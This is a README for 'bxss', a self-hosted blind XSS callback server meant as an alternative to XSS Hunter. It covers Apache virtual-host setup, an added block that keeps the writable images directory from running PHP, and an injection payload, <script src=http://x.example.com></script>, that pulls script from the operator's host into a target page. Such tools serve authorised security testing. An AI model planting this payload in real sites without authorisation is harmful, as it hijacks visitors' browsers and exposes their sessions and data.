
zyrgo/bxss

 
 


bxss

My alternative to XSS Hunter for blind XSS.



Install

git clone https://github.com/gwen001/bxss

The web server user needs write access to the images directory.

Apache

Using Apache, you can easily configure a vhost like this:

<IfModule mod_ssl.c>
<VirtualHost *:443>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
	SSLCertificateFile /etc/letsencrypt/live/x.example.com/fullchain.pem
	SSLCertificateKeyFile /etc/letsencrypt/live/x.example.com/privkey.pem
</VirtualHost>
</IfModule>

<VirtualHost *:80>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
</VirtualHost>
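
Because the images directory is writable by the web server user and sits under the DocumentRoot, it is worth making sure nothing written there can be executed or used to reconfigure Apache. The block below is an added hardening example, not part of the bxss project; it assumes Apache 2.4 and that the directory is /var/www/html/bxss/images (DocumentRoot plus images). Place it inside both VirtualHost blocks above.

```apache
# Added example (assumption: writable directory is DocumentRoot + "images").
<Directory /var/www/html/bxss/images>
	# No directory listing and no CGI execution in the writable directory.
	Options -Indexes -ExecCGI

	# Ignore any .htaccess file written into this directory, so a dropped
	# file cannot re-enable handlers or override the settings in this block.
	AllowOverride None

	# Refuse to serve PHP-style files from here, so they never reach the
	# PHP handler even if one ends up on disk.
	<FilesMatch "(?i)\.(php[0-9]?|phtml|phar)$">
		Require all denied
	</FilesMatch>
</Directory>
```

After editing, `apachectl configtest` checks the syntax before you reload the server.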

Injection

As soon as the script is available online, you can use your favorite XSS payload:

<script src=http://x.example.com></script>


Feel free to open an issue if you run into any problems with the script.
